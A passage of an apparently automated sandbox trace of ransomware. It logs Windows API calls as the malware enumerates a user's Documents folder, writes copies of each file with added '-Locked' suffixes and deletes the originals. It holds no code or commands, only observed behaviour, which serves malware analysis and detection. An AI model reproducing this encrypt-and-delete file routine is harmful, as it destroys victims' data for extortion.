dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked", cAlternateFileName="JYYUHN~2.OTS")) returned 1 [0305.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0305.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0305.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0305.539] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349e6b0e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x349e6b0e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x349e6b0e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked", cAlternateFileName="NYMPGD~2.DOC")) returned 1 [0305.539] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a387d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34a387d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34a387d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc-Locked-Locked-Locked", cAlternateFileName="O4ACLZ~2.DOC")) returned 1 [0305.539] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0305.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a4ac94, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34a4ac94, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34a4ac94, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked", cAlternateFileName="PA5CSH~2.DOC")) returned 1 [0305.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uuXtJUWZmGeM k7fGnf", cAlternateFileName="UUXTJU~1")) returned 1 [0305.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a5be70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34a5be70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34a5be70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked", cAlternateFileName="W7ZBDB~2.PPT")) returned 1 [0305.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a76bb8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34a76bb8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34a76bb8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx-Locked-Locked-Locked", cAlternateFileName="YPCZCD~2.PPT")) returned 1 [0305.541] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a87deb, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34a87deb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34a87deb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf-Locked-Locked-Locked", cAlternateFileName="ZBHJ~1.PDF")) returned 1 [0305.541] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34add4ca, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34add4ca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34add4ca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked", cAlternateFileName="ZFNXJ8~2.DOC")) returned 1 [0305.541] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34add4ca, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34add4ca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34add4ca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked", cAlternateFileName="ZFNXJ8~2.DOC")) returned 0 [0305.542] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.542] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x45 [0305.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.542] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\1feg.xlsx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.543] GetFileType (hFile=0x49c) returned 0x1 [0305.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.544] GetFileType (hFile=0x49c) returned 0x1 [0305.546] CloseHandle (hObject=0x49c) returned 1 [0305.546] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3e [0305.546] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\1feg.xlsx-locked-locked-locked")) returned 1 [0305.547] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4b [0305.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.548] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\2xkt2 -erd.pptx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.548] GetFileType (hFile=0x49c) returned 0x1 [0305.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.548] GetFileType (hFile=0x49c) returned 0x1 [0305.550] CloseHandle (hObject=0x49c) returned 1 [0305.551] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x44 [0305.551] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\2xkt2 -erd.pptx-locked-locked-locked")) returned 1 [0305.552] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0305.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.552] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4 yebkiybigx.xlsx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.552] GetFileType (hFile=0x49c) returned 0x1 [0305.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.552] GetFileType (hFile=0x49c) returned 0x1 [0305.554] CloseHandle (hObject=0x49c) returned 1 [0305.554] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x46 [0305.555] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4 yebkiybigx.xlsx-locked-locked-locked")) returned 1 [0305.555] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x46 [0305.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.555] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4gh0y9.pdf-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.556] GetFileType (hFile=0x49c) returned 0x1 [0305.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.556] GetFileType (hFile=0x49c) returned 0x1 [0305.558] CloseHandle (hObject=0x49c) returned 1 [0305.558] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3f [0305.558] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4gh0y9.pdf-locked-locked-locked")) returned 1 [0305.559] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x47 [0305.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.559] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\88z1o5.docx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.560] GetFileType (hFile=0x49c) returned 0x1 [0305.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.560] GetFileType (hFile=0x49c) returned 0x1 [0305.562] CloseHandle (hObject=0x49c) returned 1 [0305.562] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x40 [0305.562] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\88z1o5.docx-locked-locked-locked")) returned 1 [0305.563] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x55 [0305.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.563] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9wui5evhxpkholhgpv40.docx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.563] GetFileType (hFile=0x49c) returned 0x1 [0305.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.564] GetFileType (hFile=0x49c) returned 0x1 [0305.565] CloseHandle (hObject=0x49c) returned 1 [0305.566] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4e [0305.566] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9wui5evhxpkholhgpv40.docx-locked-locked-locked")) returned 1 [0305.567] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x53 [0305.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.567] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\awnrfzy3e3qk1nkjdw.pptx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.567] GetFileType (hFile=0x49c) returned 0x1 [0305.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.567] GetFileType (hFile=0x49c) returned 0x1 [0305.569] CloseHandle (hObject=0x49c) returned 1 [0305.575] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4c [0305.575] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\awnrfzy3e3qk1nkjdw.pptx-locked-locked-locked")) returned 1 [0305.576] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x51 [0305.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.576] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\azykagkuggsox2bnl.rtf-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.577] GetFileType (hFile=0x49c) returned 0x1 [0305.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.577] GetFileType (hFile=0x49c) returned 0x1 [0305.578] CloseHandle (hObject=0x49c) returned 1 [0305.579] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4a [0305.579] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\azykagkuggsox2bnl.rtf-locked-locked-locked")) returned 1 [0305.580] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x45 [0305.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.580] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\bf c.docx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.580] GetFileType (hFile=0x49c) returned 0x1 [0305.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.580] GetFileType (hFile=0x49c) returned 0x1 [0305.583] CloseHandle (hObject=0x49c) returned 1 [0305.583] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3e [0305.583] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\bf c.docx-locked-locked-locked")) returned 1 [0305.584] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4e [0305.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.584] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cerxr1ofwdsxa.xlsx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.702] GetFileType (hFile=0x49c) returned 0x1 [0305.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.703] GetFileType (hFile=0x49c) returned 0x1 [0305.705] CloseHandle (hObject=0x49c) returned 1 [0305.705] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x47 [0305.706] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cerxr1ofwdsxa.xlsx-locked-locked-locked")) returned 1 [0305.706] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x47 [0305.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.707] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.708] GetFileType (hFile=0x49c) returned 0x1 [0305.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.708] GetFileType (hFile=0x49c) returned 0x1 [0305.710] CloseHandle (hObject=0x49c) returned 1 [0305.710] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked-Locked", lpFilePart=0x0) returned 0x40 [0305.710] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini-locked-locked-locked")) returned 1 [0305.711] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: 